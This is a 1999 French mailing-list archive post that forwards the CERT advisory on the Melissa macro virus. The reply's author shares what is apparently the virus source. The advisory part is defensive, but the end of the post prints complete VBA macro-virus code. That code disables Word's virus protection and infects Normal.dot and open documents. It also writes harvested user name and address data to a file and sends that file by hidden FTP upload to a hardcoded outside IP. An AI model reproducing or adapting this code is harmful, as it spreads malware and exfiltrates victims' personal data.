[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [linux-team] FW: CERT Advisory CA-99.04 - Melissa Macro Virus



Hello... personellement j'ai eu à faire à ce virus (je crois que c'est
celui-là) le semaine passée... c'est un bête macro virus écrit en vb, qui
envoie les infos de la licence (style nom, etc...) sur un site ftp...

PS: la source du virus est en attch file...

 <<Virus.txt>> 



> ----------
> De : 	Verloove, Olivier[SMTP:olivier_verloove@merck.com]
> Répondre à : 	linux-team@rtfm.be
> Date :	samedi 3 avril 1999 16:29
> A :	'Linux Team'
> Objet :	[linux-team] FW: CERT Advisory CA-99.04 - Melissa Macro
> Virus
> 
> Pour ceux qui veulent avoir des details sur le virus Melissa ... voici une
> description detaillee.
> 
> De toute facon, cela ne s'attaque qu'aux utilisateurs d'Outlook ou
> Exchange
> qui utilisent Word97 (ou 2000) comme editeur. Cela ne devrait pas trop
> affecter les utilisateurs de Linux quoi ;-)
> 
> PS: J'ai lu sur Slashdot que la police Americaine avait arrete un suspect
> (habitant du New Jersey).
> 
> Olivier
> 
> ----------
> From:  CERT Advisory [SMTP:cert-advisory@cert.org]
> <mailto:[SMTP:cert-advisory@cert.org]> 
> Sent:  Saturday, 27 Mar, 1999 13:05
> To:  cert-advisory@coal.cert.org <mailto:cert-advisory@coal.cert.org> 
> Subject:  CERT Advisory CA-99.04 - Melissa Macro Virus
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> CERT Advisory CA-99-04-Melissa-Macro-Virus
> 	Original issue date: Saturday March 27 1999
> 	Last Revised: Saturday March 27, 1999
> 
> Systems Affected
> *	Machines with Microsoft Word 97 or Word 2000
> *	Any mail handling system could experience performance problems or a
> denial of service as a result of the propagation of this macro virus.
> 
> 	Overview
> 		At approximately 2:00 PM GMT-5 on Friday March 26 1999 we
> began receiving reports of a Microsoft Word 97 and Word 2000 macro virus
> which is propagating via email attachments. The number and variety of
> reports we have received indicate that this is a widespread attack
> affecting
> a variety of sites.
> 		Our analysis of this macro virus indicates that human action
> (in the form of a user opening an infected Word document) is required for
> this virus to propagate. It is possible that under some mailer
> configurations, a user might automatically open an infected document
> received in the form of an email attachment. This macro virus is not known
> to exploit any new vulnerabilities. While the primary transport mechanism
> of
> this virus is via email, any way of transferring files can also propagate
> the virus.
> 		Anti-virus software vendors have called this macro virus the
> Melissa macro or W97M_Melissa virus.
> 	I. Description
> 			The Melissa macro virus propagates in the form of an
> email message
> 			containing an infected Word document as an
> attachment. The transport
> 			message has most frequently been reported to contain
> the following
> 			Subject header
> 	      Subject:	Important Message From <name>
> 
> 		Where <name> is the full name of the user sending the
> message.
> 		The body of the message is a multipart MIME message
> containing two sections. The first section of the message (Content-Type:
> text/plain) contains the following text.
> 		Here is that document you asked for ... don't show anyone
> else ;-)
> 			The next section (Content-Type: application/msword)
> was initially
> 			reported to be a document called "list.doc". This
> document contains
> 			references to pornographic web sites. As this macro
> virus spreads we
> 			are likely to see documents with other names. In
> fact, under certain
> 			conditions the virus may generate attachments with
> documents created
> 	by the victim.
> 
> 		When a user opens an infected .doc file with Microsoft
> Word97 or Word2000, the macro virus is immediately executed if macros are
> enabled.
> 		Upon execution, the virus first lowers the macro security
> settings to permit all macros to run when documents are opened in the
> future.  Therefore, the user will not be notified when the virus is
> executed
> in the future.
> 		The macro then checks to see if the registry key
> 		"HKEY_Current_User\Software\Microsoft\Office\Melissa?"
> 		has a value of "... by Kwyjibo". If that registry key does
> not exist or does not have a value of "... by Kwyjibo", the virus proceeds
> to propagate itself by sending an email message in the format described
> above to the first 50 entries in every MAPI address book readable by the
> user executing the macro. Keep in mind that if any of these email
> addresses
> are mailing lists, the message will be delivered to everyone on the
> mailing
> lists. In order to successfully propagate, the affected machine must have
> Microsoft Outlook installed; however, Outlook does not need to be the
> mailer
> used to read the message.
> 		Next, the macro virus sets the value of the registry key to
> "... by Kwyjibo". Setting this registry key causes the virus to only
> propagate once per session. If the registry key does not persist through
> sessions, the virus will propagate as described above once per every
> session
> when a user opens an infected document. If the registry key persists
> through
> sessions, the virus will no longer attempt to propagate even if the
> affected
> user opens an infected document.
> 		The macro then infects the Normal.dot template file. By
> default, all Word documents utilize the Normal.dot template; thus, any
> newly
> created Word document will be infected. Because unpatched versions of
> Word97
> may trust macros in templates the virus may execute without warning. For
> more information please see:
> 		http://www.microsoft.com/security/bulletins/ms99-002.asp
> <http://www.microsoft.com/security/bulletins/ms99-002.asp> 
> 		Finally, if the minute of the hour matches the day of the
> month at this point, the macro inserts into the current document the
> message
> "Twenty-two points, plus triple-word-score, plus fifty points for using
> all
> my letters. Game's over. I'm outta here."
> 		Note that if you open an infected document with macros
> disabled and look at the list of macros in this document, neither Word97
> nor
> Word2000 list the macro. The code is actually VBA (Visual Basic for
> Applications) code associated with the "document.open" method. You can see
> the code by going into the Visual Basic editor.
> 		If you receive one of these messages, keep in mind that the
> message came from someone who is affected by this virus and they are not
> necessarily targeting you. We encourage you to contact any users from
> which
> you have received such a message. Also, we are interested in understanding
> the scope of this activity; therefore, we would appreciate if you would
> report any instance of this activity to us according to our Incident
> Reporting Guidelines document available at:
> 		http://www.cert.org/tech_tips/incident_reporting.html
> <http://www.cert.org/tech_tips/incident_reporting.html> 
> 	II. Impact
> *	Users who open an infected document in Word97 or Word2000 with
> macros enabled will infect the Normal.dot template causing any documents
> referencing this template to be infected with this macro virus. If the
> infected document is opened by another user, the document, including the
> macro virus, will propagate. Note that this could cause the user's
> document
> to be propagated instead of the original document, and thereby leak
> sensitive information.
> *	Indirectly, this virus could cause a denial of service on mail
> servers. Many large sites have reported performance problems with their
> mail
> servers as a result of the propagation of this virus.
> 
> 	III. Solutions
> *	Block messages with the signature of this virus at your mail
> transfer agents.
> 
> 			With Sendmail
> 			Nick Christenson of sendmail.com provided
> information about configuring sendmail to filter out messages that may
> contain the Melissa virus. This information is available from the follow
> URL:
> 	
> ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-m
> <ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-m> 
> 			elissa-filter.txt
> *	Utilize virus scanners
> 
> 		Most virus scanning tools will detect and clean macro
> viruses. In order to detect and clean current viruses you must keep your
> scanning tools up to date with the latest definition files.
> *	McAfee / Network Associates
> 
> 				http://vil.mcafee.com/vil/vm10120.asp
> <http://vil.mcafee.com/vil/vm10120.asp> 
> 	
> http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
> <http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp> 
> *	Symantec
> 
> 	
> http://www.symantec.com/avcenter/venc/data/mailissa.html
> <http://www.symantec.com/avcenter/venc/data/mailissa.html> 
> *	Trend Micro
> 
> 	
> http://housecall.antivirus.com/smex_housecall/technotes.html
> <http://housecall.antivirus.com/smex_housecall/technotes.html> 
> *	Encourage users at your site to disable macros in Microsoft Word
> 
> 			Notify all of your users of the problem and
> encourage them to disable macros in Word. You may also wish to encourage
> users to disable macros in any product that contains a macro language as
> this sort of problem is not limited to Microsoft Word.
> 			In Word97 you can disable automatic macro execution
> (click Tools/Options/General then turn on the 'Macro virus protection'
> checkbox). In Word2000 macro execution is controlled by a security level
> variable similar to Internet Explorer (click on Tools/Macro/Security and
> choose High, Medium, or Low). In that case, 'High' silently ignores the
> VBA
> code, Medium prompts in the way Word97 does to let you enable or disable
> the
> VBA code, and 'Low' just runs it.
> 			Word2000 supports Authenticode on the VB code. In
> the 'High' setting you can specify sites that you trust and code from
> those
> sites will run.
> *	General protection from Word Macro Viruses
> 
> 			For information about macro viruses in general, we
> encourage you to review the document "Free Macro AntiVirus Techniques" by
> Chengi Jimmy Kuo which is available at.
> 			http://www.nai.com/services/support/vr/free.asp
> <http://www.nai.com/services/support/vr/free.asp> 
> 	Acknowledgements
> 		We would like to thank Jimmy Kuo of Network Associates, Eric
> Allman and Nick Christenson of sendmail.com, Dan Schrader of Trend Micro,
> and Jason Garms and Karan Khanna of Microsoft for providing information
> used
> in this advisory.
> 		Additionally we would like to thank the many sites who
> reported this activity.
> 	
> ______________________________________________________________________
> 
> 		This document is available from:
> 	
> http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html
> <http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html> .
> 	
> ______________________________________________________________________
> 
> 	CERT/CC Contact Information
> 		Email: cert@cert.org <mailto:cert@cert.org> 
> 		Phone: +1 412-268-7090 (24-hour hotline)
> 		Fax: +1 412-268-6989
> 		Postal address:
> 		CERT Coordination Center
> 		Software Engineering Institute
> 		Carnegie Mellon University
> 		Pittsburgh PA 15213-3890
> 		U.S.A.
> 
> 		CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) /
> EDT(GMT-4) Monday through Friday; they are on call for emergencies during
> other hours, on U.S. holidays, and on weekends.
> 	Using encryption
> 		We strongly urge you to encrypt sensitive information sent
> by email.
> 		Our public PGP key is available from
> http://www.cert.org/CERT_PGP.key <http://www.cert.org/CERT_PGP.key> .  If
> you prefer to use DES, please call the CERT hotline for more information.
> 	Getting security information
> 		CERT publications and other security information are
> available from our web site http://www.cert.org/ <http://www.cert.org/> .
> 		To be added to our mailing list for advisories and
> bulletins, send email to cert-advisory-request@cert.org
> <mailto:cert-advisory-request@cert.org>  and include SUBSCRIBE
> your-email-address in the subject of your message.
> 		Copyright 1999 Carnegie Mellon University.
> 		Conditions for use, disclaimers, and sponsorship information
> can be found in http://www.cert.org/legal_stuff.html
> <http://www.cert.org/legal_stuff.html> .
> *	"CERT" and "CERT Coordination Center" are registered in the U.S.
> 		Patent and Trademark Office
>    ______________________________________________________________________
> 
> 	NO WARRANTY
> 	Any material furnished by Carnegie Mellon University and the
> Software Engineering Institute is furnished on an "as is" basis. Carnegie
> Mellon University makes no warranties of any kind, either expressed or
> implied as to any matter including, but not limited to, warranty of
> fitness
> for a particular purpose or merchantability, exclusivity or results
> obtained
> from use of the material. Carnegie Mellon University does not make any
> warranty of any kind with respect to freedom from patent, trademark, or
> copyright infringement.
>    ______________________________________________________________________
> 
> Revision History
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBNvy9H3VP+x0t4w7BAQG1ggP7B8ItzTRpkP2O8JK7olIOdmn072PIZZxE
> mJDW+A9fLDvRZQlVDSsFz/aH8ivmhor5ZbvtT14OmfIZWvxYdFnbO/s2WYL7+fV5
> jL6mSb4AJ6lRXIYii+t22V0lvqJdP6VRFqy9EibpMtU2dhgFYf3TKX5e6wajOmBx
> bZ6Ef5jPilA=
> ªBH
> -----END PGP SIGNATURE-----
> ---------
> This message was sent by Majordomo 1.94.3. Please repport problems to
> manu@rtfm.be. If you want to be deleted from the list, send a mail to
> majordomo@rtfm.be with "unsubscribe linux-team" in the body.
> 
Private Sub Document_Close()

On Error Resume Next

Const Marker = "<- this is a marker!"

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String

'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)


'Switch the VirusProtection OFF
Options.VirusProtection = False


  If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
  
    If DocumentInfected = True Then
      LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    ElseIf NormalTemplateInfected = True Then
      LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    End If
    
    LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
    
    For i = 1 To 4
      LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
    Next i
    LogFile = "C:\hsf" & LogFile & ".sys"
    
    Open LogFile For Output As #1
    Print #1, LogData
    Close #1
    
    Open "c:\netldx.vxd" For Output As #1
    Print #1, "o 209.201.88.110"
    Print #1, "user anonymous"
    Print #1, "pass itsme@"
    Print #1, "cd incoming"
    Print #1, "ascii"
    Print #1, "put " & LogFile
    Print #1, "quit"
    Close #1
    
    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
    
  End If


'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
  'Infect the NormalTemplate
  If DocumentInfected = True Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

    
    'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i

    OurCode = OurCode & Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                     Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)


    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    
    If SaveNormalTemplate = True Then NormalTemplate.Save
    
  End If


  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
    SaveDocument = ActiveDocument.Saved
    
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    
    If SaveDocument = True Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub